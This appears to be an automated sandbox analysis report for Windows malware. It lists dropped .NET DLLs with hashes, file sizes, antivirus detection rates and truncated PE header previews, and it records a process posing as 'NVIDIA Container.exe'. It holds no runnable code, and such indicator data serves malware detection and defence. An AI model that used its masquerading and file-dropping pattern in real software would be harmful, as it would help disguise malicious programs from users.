                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):33792
                                                          Entropy (8bit):5.541771649974822
                                                          Encrypted:false
                                                          SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                          MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                          SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                          SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                          SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 38%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):69632
                                                          Entropy (8bit):5.932541123129161
                                                          Encrypted:false
                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):69632
                                                          Entropy (8bit):5.932541123129161
                                                          Encrypted:false
                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):69632
                                                          Entropy (8bit):5.932541123129161
                                                          Encrypted:false
                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):69632
                                                          Entropy (8bit):5.932541123129161
                                                          Encrypted:false
                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):85504
                                                          Entropy (8bit):5.8769270258874755
                                                          Encrypted:false
                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):85504
                                                          Entropy (8bit):5.8769270258874755
                                                          Encrypted:false
                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):69632
                                                          Entropy (8bit):5.932541123129161
                                                          Encrypted:false
                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):32256
                                                          Entropy (8bit):5.631194486392901
                                                          Encrypted:false
                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):85504
                                                          Entropy (8bit):5.8769270258874755
                                                          Encrypted:false
                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):69632
                                                          Entropy (8bit):5.932541123129161
                                                          Encrypted:false
                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):85504
                                                          Entropy (8bit):5.8769270258874755
                                                          Encrypted:false
                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):85504
                                                          Entropy (8bit):5.8769270258874755
                                                          Encrypted:false
                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):32256
                                                          Entropy (8bit):5.631194486392901
                                                          Encrypted:false
                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):33792
                                                          Entropy (8bit):5.541771649974822
                                                          Encrypted:false
                                                          SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                          MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                          SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                          SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                          SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 38%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):33792
                                                          Entropy (8bit):5.541771649974822
                                                          Encrypted:false
                                                          SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                          MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                          SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                          SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                          SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 38%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):85504
                                                          Entropy (8bit):5.8769270258874755
                                                          Encrypted:false
                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):32256
                                                          Entropy (8bit):5.631194486392901
                                                          Encrypted:false
